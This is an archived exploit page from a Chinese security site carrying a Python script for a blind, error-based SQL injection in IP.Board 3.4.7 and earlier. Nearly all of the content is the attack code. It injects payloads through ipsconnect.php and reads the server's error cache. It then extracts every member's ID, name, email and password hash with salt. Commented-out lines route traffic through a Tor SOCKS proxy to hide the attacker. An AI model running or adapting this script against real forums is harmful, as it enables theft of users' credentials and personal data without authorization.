首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IP.Board 3.4.7 SQL Injection
来源:secthrowaway@safe-mail.net 作者:secthrowaway 发布时间:2014-11-11  
#!/usr/bin/env python
# Sunday, November 09, 2014 - secthrowaway@safe-mail.net
# IP.Board <= 3.4.7 SQLi (blind, error based); 
# you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable

url = 'http://target.tld/forum/'
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

import sys, re

# <socks> - http://sourceforge.net/projects/socksipy/
#import socks, socket
#socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
#socket.socket = socks.socksocket
# </socks>

import urllib2, urllib

def inject(sql):
	try:
		urllib2.urlopen(urllib2.Request('%sinterface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and extractvalue(1,concat(0x3a,(%s)))#\'' % sql), headers={"User-agent": ua}))
	except urllib2.HTTPError, e:
		if e.code == 503:
			data = urllib2.urlopen(urllib2.Request('%scache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read()
			txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
			if txt is not None: 
				return txt.group(1)
			sys.exit('Error [3], received unexpected data:\n%s' % data)
		sys.exit('Error [1]')
	sys.exit('Error [2]')

def get(name, table, num):
	sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
	s = int(inject('LENGTH((%s))' % sqli))
	if s < 31:
		return inject(sqli)
	else:
		r = ''
		for i in range(1, s+1, 31):
			r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
		return r

n = inject('SELECT COUNT(*) FROM members')
print '* Found %s users' % n
for j in range(int(n)):	
	print get('member_id', 'members', j)
	print get('name', 'members', j)
	print get('email', 'members', j)
	print get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', 'members', j)
	print '----------------'

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Internet Explorer 8 MS14-035 U
·MS Office 2007 and 2010 - OLE
·Visual Mining NetCharts Server
·Internet Explorer OLE Automati
·tnftp "savefile" Arbitrary Com
·Internet Explorer OLE Automati
·ManageEngine Eventlog Analyzer
·MS14-064 Microsoft Windows OLE
·PicsArt Photo Studio For Andro
·MS14-064 Microsoft Windows OLE
·Belkin n750 jump login Paramet
·MS14-064 Microsoft Windows OLE
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved